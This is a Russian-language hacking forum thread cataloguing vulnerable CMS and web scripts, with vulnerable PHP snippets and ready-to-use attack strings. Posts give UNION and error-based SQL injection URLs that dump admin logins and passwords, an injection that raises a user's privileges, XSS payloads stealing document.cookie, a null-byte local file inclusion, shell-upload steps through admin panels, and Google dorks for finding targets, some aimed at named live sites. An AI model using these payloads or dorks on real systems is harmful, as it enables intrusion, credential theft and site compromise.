Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    _________________________
  2. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    phpComasy v1.0.1
    Скачать

    Активная XSS
    Пример одного сайта:
    Code:
    http://www.natamohn.com/?id=12&mod_action=add_guestbook_entry_form
    Уязвимые поля>>
    Code:
    Firstname* , Lastname, e-Mail , WWW ,  Comment*
    doc:powered by phpComasy
     
    _________________________
    #422 Дирижабль, 26 Oct 2010
    Last edited: 26 Oct 2010
    3 people like this.
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Apprain CMS
    Version:0.1.X

    Off Site: http://www.apprain.com/
    (1.11.2010)

    Заливка шелла через админку
    1. Способ| Gallery -> Add New Picture
    написанно "*.jpg, *.gif, *.png" но шелл заливается удачно, адресс шелла /uploads/filemanager/ *** .php
    2. Способ| Store-> Add New product

    PHP:
    var uploadAllFiles, uploadOnlyImageFiles;
        window.onload = function() {
            uploadAllFiles = new SWFUpload({
                // Backend Settings
                upload_url: "<?php echo $this->baseurl('/common/general_upload/'); ?>",
                post_params: {"PHPSESSID" : "<?php echo session_id(); ?>"},
                // File Upload Settings
                file_size_limit : "102400",    // 100MB
                file_types : "*.*",
                file_types_description : "All Files",
                file_upload_limit : "100",
                file_queue_limit : "0",
    .......
    Активная XSS

    /member/signup
    При регистрацыии Пользователя -> First Name - Last Name - Address
    PHP:
    echo $this->get_tag("form",array("method"=>"post","class"=>"app_form app_validation","id"=>"signup_form","action"=> $this->baseurl("/member/signup")));
            echo 
    $this->get_tag("ul");
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("First Name"),App::Load("Helper/Html")->inputTag("data[Member][f_name]","",array("class"=>"input check_notempty",'id'=>'f_name','longdesc'=>'Please enter your first name')) );
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("Last Name"),App::Load("Helper/Html")->inputTag("data[Member][l_name]","",array("class"=>"input check_notempty",'id'=>'l_name','longdesc'=>'Please enter your last name')) );
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("Country"), App::Load("Helper/Html")->countryTag("data[Member][country]","",array("title"=>"Country","id" => "country","class"=>"select check_notempty"),array('title'=>'Your Country','longdesc'=>'Please select your country')) );
                echo 
    App::Load("Helper/Html")->get_from_row($this->__("Address"),App::Load("Helper/Html")->textareaTag("data[Member][address]","",array("rows"=>"3","class"=>"input check_notempty",'id'=>'address','longdesc'=>'Enter your address infomration')) );
    /admin/account/edit

    /information/manage/blog-post

    Редактируем "Title" на "><script>window.location.href='http://www.google.de/';</script>

    /admin/config/general
    Admin Setting -> Site Title

    и во многих других местах админки

    Пассивная XSS
    www.localhost/quickstart/admin/forgotlogin

    \development\view\system\admin\forgotlogin.phtml
    Fotgoet Password-> Enter you Email Address ->
    PHP:
    <li style="width:500px"><input  type="text" style="width:500px" name="data[Admin][email]" class="input_app_login" value="<?php echo isset($this->data['Admin']['email']) ? $this->data['Admin']['email'] : "" ?>" /></li>
    +
    Search
    \development\view\whitecloud\home\search.phtml
    PHP:
    <?php $this->__("Search Reasult for"?> '<?php echo $srcstr;?>'</h1>
        <?php if(!empty($srcarr['data'])):?>
            <p><?php echo $this->__("Total result found ");?><?php echo $srcarr['total']; </p>
        <?
    php if($srcarr['paging']): ?><br />
            <p><?php echo $srcarr['link'];?> <?php echo $srcarr['paging'];?></p>
            <?php endif;?><ul>
            <?php foreach($srcarr['data'] as $val):?>
                <li><h2><?php echo($val['_parmalink']);?></h2><p><?php echo substr(strip_tags($val['_parmadesc']),0,400);?>
     
    _________________________
    #423 Дирижабль, 1 Nov 2010
    Last edited: 1 Nov 2010
    2 people like this.
  4. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Уязвимости Open Constructor

    Тип уязвимости: SQL inj
    Зависимости: Права админа
    Куски уязвимых кодов:
    PHP:
    <?php
        
    require_once($_SERVER['DOCUMENT_ROOT'].'/openconstructor/lib/wccommons._wc');
        
    WCS::requireAuthentication();
        
        
    $db = &WCDB::bo();
        [
    B]$res $db->query('SELECT id, ds_type, obj_type FROM objects WHERE id='.$_GET['id']);[/B]
        
    $obj mysql_fetch_assoc($res);
        
    mysql_free_result($res);
        if(
    $obj) {
            
    header('Location: '.$obj['ds_type'].'/'.$obj['obj_type'].'.php?id='.$obj['id']);
            die();
        }
        
    assert(true === false);
    ?>
    PHP:
    <?php
        
    require_once($_SERVER['DOCUMENT_ROOT'].'/openconstructor/lib/wccommons._wc');
        
    System::request('data');
        require_once(
    LIBDIR.'/languagesets/'.LANGUAGE.'/editors._wc');
        
        
    assert(isset($_GET['ds_id']) && isset($_GET['id']));
        require_once(
    $_SERVER['DOCUMENT_ROOT'].WCHOME.'/include/toolbar._wc');
        require_once(
    LIBDIR.'/site/pagereader._wc');
        
    $pr = &PageReader::getInstance();
        require_once(
    LIBDIR.'/dsmanager._wc');
        
    $dsm = new DSManager();
        
    $_ds = &$dsm->load($_GET['ds_id']); 
        
    assert($_ds->ds_id 0);
        
        if(
    $_GET['id'] == 'new') {
            
    $pages = &$pr->getAllPages();
            
    $db = &WCDB::bo();
            
    $res $db->query(
                
    'SELECT id '.
                
    'FROM dshtmltext '.
                
    'WHERE ds_id = '.$_ds->ds_id
            
    );
            while(
    $r mysql_fetch_assoc($res))
                unset(
    $pages[$r['id']]);
            
    mysql_free_result($res);
        } else {
            
    $page = &$pr->getPage($_GET['id']);
            
    assert($page != null);
            
    $_doc $_ds->get_record($_GET['id']);
            
    assert($_doc != null);
        }
        require_once(
    LIBDIR.'/syntax/syntaxhighlighter._wc');
        
    $m = array();
        
    preg_match_all('~<([A-Z0-9]+)~'strtoupper($_ds->allowedTags), $mPREG_PATTERN_ORDER);
        
    $allowed = (array) @$m[1];
        
    $sDoc $_ds->wrapDocument($_doc);
        
    $save $_GET['id'] == 'new' WCS::decide($_ds'createdoc') && sizeof($pages) > WCS::decide($_ds'editdoc') || WCS::decide($sDoc'editdoc');
    ?>
    Примеры:
    localhost/../objects/edit.php?j=1&id=4%20union%20select%201,2,3--



    localhost/../../htmltext/edit.php?ds_id=90&id=36%20union%20select%201,2,3,4,5,6,7,8--
     
    #424 -PRIVAT-, 2 Nov 2010
    Last edited by a moderator: 2 Nov 2010
    1 person likes this.
  5. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Уязвимости Simple CMS

    О Simple CMS​

    От себя хочу сказать, что Simple CMS. ver.1.0. вся дырявая. Почти на каждом месте есть SQL inj.
    По дорку гугла мне выдало "Результатов: примерно 14 800 (0,35 сек.) ".

    SQL инъекции:​

    SQL inj в выборе статьи, уязвимый код:
    PHP:
    if (isset($_GET['artcl']))
    {
        
    $id_art $_GET['artcl'];
        
    $article mysql_query("SELECT title, article FROM artcl WHERE IDart=".$id_art);
    Как видно, нет никакой фильтрации..
    Пример: localhost/index.php?id=3&artcl=-4 union select version(),2--

    SQL inj в выборе раздела, уязвимый код:
    PHP:
        if (isset($_GET['id']))
        {
            
    $id $_GET['id'];
        }
        else
        {
            
    $id 1;
        }
        print 
    "<table width='100%' cellpadding=2 cellspacing=2>";
        
    $razdel mysql_query("SELECT menu, txt FROM tree WHERE id=".$id);
    Пример: localhost/index.php?id=-3 union select 1,version()--

    Незачем дальше перечислять, она вся в дырках.
    К сожалению, хочу отметить, что пароли администраторов не хранятся в БД. Они находятся в файле connect.php.
    Панель администратора находится по адресу /admin/, если вы попали в админку, то заходим: Баннеры > льём через форму загрузки баннеров шелл > шелл будет доступен по адресу images/shell.php
    Вот вам пример, хекайте!
    P.S Дорк "intext:Разработано Яшиной С. svetulik2004@mail.ru".

    Модуль Новостей​

    Только что зашёл на официальный сайт в раздел Мои разработки, скачал модуль новостей и снова он бажный :(.
    PHP:
    if (isset($_GET['id_news']))
            {
                
    $id_news $_GET['id_news'];
                
    $news mysql_query("SELECT rus_name, rus_annonce, rus_content, date FROM news WHERE id=".$id_news);
    Пример: localhost/news/news.php?id_news=-2 union select version(),2,3,4--


    З.Ы Писала движок девушка ;). Официальный сайт

     
    #425 -PRIVAT-, 2 Nov 2010
    Last edited by a moderator: 2 Nov 2010
  6. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Уязвимости Booot CMS

    Тип уязвимости: SQL inj
    Зависимости: Права админа

    Куски уязвимых кодов:
    PHP:
    if(isset($_GET['top'])) {
                
    $i $this->db->rows("SELECT * FROM `prefix_products_topics` WHERE `id` = ".$_GET['top']);

    PHP:
    if(!isset($_GET['top'])) {
    ....
    $i $this->db->rows("SELECT * FROM `prefix_content` WHERE `id` = ".$_GET['top']);
    PHP:
    if(!isset($_GET['top'])) {
    ....
    $i $this->db->rows("SELECT * FROM `prefix_content` WHERE `id` = ".$_GET['top']);
    Примеры:
    host/admin/?module=Catalog&method=Info&top=-12 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--


    host/admin/?module=Content&method=Info&top=-5 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3--
    Уязвима вся админка. Видимо разработчики решили, что баги в админке никому не нужны..​
     
    #426 -PRIVAT-, 2 Nov 2010
    Last edited by a moderator: 2 Nov 2010
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    Дополнение к посту от SeNaP
    WAP ENGINE 4.2 (Возможно и другие версии)

    активная xss в гостевой книге

    \modules\guest\send.php
    PHP:
    $url "$_POST[url]";
    ...
    $url trim($url);
    $url str_replace('http://','',$url);
    $url str_replace('|'''$url);
    Сайт (URL): __XSS

    Путь
     
    _________________________
    1 person likes this.
  8. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Ajax OnlineShop 1.0

    SQL Injection

    оффсайт:
    Code:
    http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29

    параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split


    PHP:
    // if get id in url but no #
                if ( (<? echo $id_page; ?> != 0) && (!<? echo $startpage ?>) && (document.URL.search(/#.+/) == -1) ) {
                    wohinJS = 'reload';
                    var start_name = document.URL.split ('?id=');
                    var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name
                    addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page
                }
                else {
                    var start_name = document.URL.split ('#');
                    <? if ($reg_now == 0) { // no registration ?>
                        if (start_name[1]) { // exist history-ID in url...
                            wohinJS = 'reload';
                            start_name = start_name[1].split ('('); // ...yes, split the name
                            var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)
                            //$('log').innerHTML = start_name[0] + " - " + start_id; // testing
                            var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name
                            addHistoryEvent(hist_event_name, start_id); // load requested page
                        }
                        else { // ...no, then load shop-startpage
                            <?
                                echo get_startpage_link(false, true);
                            ?>                    
    уязвимы все сайты,их достаточно много:)
     
    #428 547, 13 Nov 2010
    Last edited: 13 Nov 2010
    2 people like this.
  9. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    547, не тот код уязвим.
    Так правильнее будет.
    --->index.php
    PHP:
    if ( (isset($_GET['id'])) && ($_GET['id'] != "") ) { 
        
    $startpage "false"
        
    $id_page $_GET['id']; 

    else { 
        
    $id_page get_startpage_link(falsefalsetrue); 
        
    $startpage "true"

    $seo_infos seo_get_site_infos($id_page);
    --->config.php
    PHP:
    function get_prod_comments($page$prod_id$new_added) {  
    global 
    $db$js$outputText ""$backgr_zaehler 0$backgr "backgroundcolor: #".$GLOBALS["row_colors"]['backgr_maindivs'].";"


    $seitenzahl_arr gen_seitenzahlarr($page"""""aong_shop_art_comments"$db"prodID = {$prod_id} AND del='N'""prodcomments"); 


    $limit ""
    if (!
    $js) {  
        
    $limit " LIMIT ".$seitenzahl_arr["start"].", ".$seitenzahl_arr["proseite"];  



    $result $db->sql("SELECT * FROM aong_shop_art_comments ".$seitenzahl_arr["where_state"]." ORDER BY ID DESC{$limit}");


     
    $page_prodcomments_amount $db->count_rows(); 
      if (!
    $js) { 
                
    $outputText .= gen_seitenzahlen($page1$seitenzahl_arr["proseite"], $seitenzahl_arr["seiten"], $seitenzahl_arr["start"], "oben""""""""""prodcomments"$prod_id); 
                } 
       
    $outputText .=  
       
    "<div id=\"div_prodcomments\" class=\"div_main_inhalt\" style=\"width: 618px; {$backgr} text-align: left; margin: 0px; border-left: 0px; border-right: 0px; border-bottom: 0px; padding: 0px 0px 0px 0px; border-top: 0px;\">"
      while (
    $row mysql_fetch_array($result)) { 
          
         if (
    $backgr_zaehler%== 0){  
              
    $backgr "background-color: #".$GLOBALS["row_colors"]['backgr_maindivs'].";";  
              }  
         else{  
              
    $backgr "background-color: #".$GLOBALS["row_colors"]['backgr_div_weich'].";";  
             } 
                   
         if ( (
    $new_added) == && ($backgr_zaehler == 0) ){ 
                
    $new_added_addon " color: #2A5206;";  
              }  
         else {  
                
    $new_added_addon "";  
              } 
           
         
    $outputText .= 
            <div style=\"clear: both; float: left; width: 614px;
    {$new_added_addon} padding: 0px 2px 0px 2px; {$backgr} font-size: 11px; border-top: 1px solid #".$GLOBALS["row_colors"]['rahmenfarbe_divs'].";"
         if (
    $backgr_zaehler == 0) { 
          
    $outputText .= " padding-top: 5px;";  
          }  
         
    $outputText .= "\"><b>".$row["name"]."</b></div><div style=\"clear: both; float: left; width: 200px;{$new_added_addon} padding: 0px 2px 0px 2px; {$backgr} font-size: 11px;\"><i>am ".date("d.m.Y"$row["time"])." um ".date("H:i"$row["time"])." Uhr</i> 
            </div> 
            <div style=\"float: right; width: 410px; text-align: right;
    {$new_added_addon} padding: 0px 2px 0px 2px; {$backgr} font-size: 11px;\"> 
                <i>vor "
    .intervall(time()-$row["time"])."</i> 
            </div> 
                 
            <div style=\"clear: both; float: left; width: 614px;
    {$new_added_addon} {$backgr} font-size: 11px; padding: 10px 2px 20px 2px;\"> 
                "
    .nl2br($row["txt"]).
            </div>"
    ;  
         
        
    $backgr_zaehler++;  
      } 
         
    $outputText .= "</div>";  
         if (!
    $js) {  
            
    $outputText .= gen_seitenzahlen($page1$seitenzahl_arr["proseite"], $seitenzahl_arr["seiten"], $seitenzahl_arr["start"], "unten""""""""""prodcomments"$prod_id);  
          }  
    return 
    $outputText;  

    ....
    https://rdot.org/forum/showpost.php?p=9338&postcount=5
     
    #429 SeNaP, 14 Nov 2010
    Last edited: 15 Nov 2010
    1 person likes this.
  10. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    MyMuWeb 0.7,0.6 (более ранние не смотрел)

    Движок довольно часто встречается на игровых серверах Mu Online. Фикс давно вышел, но есть еще довольно много "отсталых".

    Sql injection :

    Code:
    http://localhost/?ref='updаtе/**/memb_info/**/set/**/mmw_status='9'/**/where/**/memb___id='Ваш юзернейм'--&ref=Существующий на сервере юзернейм (можно свой)
    П.С. БД железобетонно MSSQL.
     
    #430 DeepBlue7, 15 Nov 2010
    Last edited: 15 Nov 2010
    1 person likes this.
  11. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Дополнение к посту от 547

    Ajax OnlineShop 1.0

    Xss
    офф-демо-сайт
    Code:
    http://www.ajax-onlineshop.de/demo/index.php?id=1"><script>alert('d0s')</script>
    +xss на офф.сайте
    Code:
    http://www.ajax-onlineshop.de/servicemail/
    Заполняем все поля,уязвимое поле - Name
    Вбиваем туда что-нибудь типо
    Code:
    "><script>alert(1)</script><
     
    1 person likes this.
  12. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    osPHPSite 0.0.1 Beta
    http://www.osphpsite.com/

    SQL Injection:
    /index.php
    PHP:
    ...
    $id $_GET['id'];
    database_connect();
    $query "SELECT * from content
              WHERE id = 
    $id";
    ...
    Пример:
    Code:
    http://php/index.php?id=25%20union%20select%201,concat_ws(0x3a,id,username,password),3,4,5,6,7,8 from user--
    
    Необходимы права администратора. Путь:
    Code:
    http://php/admin/index.php?page[]=config
    Многие места так же уязвимы к SQL inj. Скрипт полностью бажный.
     
    2 people like this.
  13. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    NinkoBB v. 1.3
    http://ninkobb.com/

    XSS:
    Создаем новый топик, по адресу message.php с "Subject" и "Message" содержанием:
    Code:
    <script>alert('xss')</script>[/B]
    
    И пока топик висит на главной странице имеем активную XSS.
     
    1 person likes this.
  14. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    KAPCMS v0.904
    http://kapcms.ru/

    XSS
    Вписываем в поле поиска пишем:
    Code:
    <script>alert(1)</script>
    
    Гет запрос будет выглядить следующем образом:
    Code:
    http://kapcms.ru/?s=<script>alert(1)</script>&page=11[/B]
    
     
    1 person likes this.
  15. ALIM

    ALIM Member

    Joined:
    20 Apr 2010
    Messages:
    60
    Likes Received:
    6
    Reputations:
    5
    Creativestate
    Тип уязвимости: SQL inj

    http://www.creativestate.com/work
    dork:Site design by Creative State

    админка:localhost/admin/

    пример:/index.cfm?id=-2%20union%20select%201,2,3,4,5,6,7,8,group_concat(managerLogin,0x3a,managerPassword)%20from%20managers%20--
     
    1 person likes this.
  16. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Web@all CMS
    http://webatall.com/
    XSS
    Вписываем в поле поиска (сразу под формой входа в правом верхнем углу,если кто ненашел):
    Code:
    <script>alert(document.cookie)</script>
     
    #436 ~d0s~, 11 Dec 2010
    Last edited: 11 Dec 2010
  17. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Дополнение к посту Root-access
    CompactCMS
    офф сайт: compactcms.nl

    XSS
    content/403.php
    PHP:
    <?php echo $_GET['page']; ?>
    Пример:
    Code:
    http://demo.compactcms.nl/content/403.php?page=<script>alert(document.cookie)</script>
    Тоже самое в файле 404.php по соседству.
     
    #437 ~d0s~, 20 Dec 2010
    Last edited: 10 Jan 2011
  18. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    xzengine 1.7 beta 8
    Офф сайт xzengine.ru
    DORK : "Powered by xzengine"
    SQL injection

    Крутим через ошибку,пример на нескольких сайтах:
    Code:
    http://xzengine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
    http://glassofvine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
    http://hightvoltage.net/index.php?category=1+and+ExtractValue(1,concat(0x5c,(select+version())))--+
    
    XSS
    Пример:
    Code:
    http://xzengine.ru/index.php?category=1--><script>alert(1)</script>
    Заливка шелла,нужны права админа
    В админке "загрузить файл",льем наш шелл и он будет по адресу site.com/upload/shell.php

    //если есть возможность(двиг не платный) то показывайте уязвимый код. (Konqi)

    Фараон
    Не совсем так,даже если ты закоментируешь обращение к бд ето,то инъекция будет,т.к. там еще 2 обращение к бд с этой переменной.И зачем ты копировал мой пост? :(
     
    #438 ~d0s~, 10 Jan 2011
    Last edited: 10 Jan 2011
    2 people like this.
  19. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    154
    Likes Received:
    105
    Reputations:
    83
    Дополнение к посту ~d0s~(#444):

    Xzengine 1.7 beta 8

    SQL injection:
    /index.php
    PHP:
    ...
    require_once 
    './classes/viewnews.php';
    ...
    if(isset(
    $_GET['category']))
        
    $category $_GET['category'];
    ...
    /viewnews.php
    PHP:
    ...
            if(
    $category == 0)
            {    
    $result AbstractDataBase::Instance()->query('SELECT * FROM '.DATABASE_TBLPERFIX.'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 ORDER BY news_id DESC  LIMIT '.$newsperpage $page.','.$newsperpage);
            }
            else
            {    
    $result AbstractDataBase::Instance()->query('SELECT * FROM '.DATABASE_TBLPERFIX.'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 AND news_category = '.$category.' ORDER BY news_id DESC  LIMIT '.$newsperpage $page.','.$newsperpage);
            }
    ...
    Пример:
    Code:
    http://eng/index.php?category=3%20union%20select%20concat_ws(0x3a,users_login,users_password),2,3,4,5,6,7,8,9,10,11,12,13%20from%20xz_users%20limit%200,1--
     
    #439 Фараон, 10 Jan 2011
    Last edited: 10 Jan 2011
  20. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Sobak CMS 0_2
    Скачате: http://sourceforge.net/projects/sobakcms/
    LFI
    Need: rg = on ; mq = off
    index.php
    PHP:
    $id $_GET['id'];
    //...
    if ($isInWebs == true) {
     include (
    'webs/'.$id.'.php'); 
    }
    //...
    эксплуатация:
    Code:
    http://localhost/sobak/index.php?isInWebs=1&id=../robots.txt%00
     
Loading...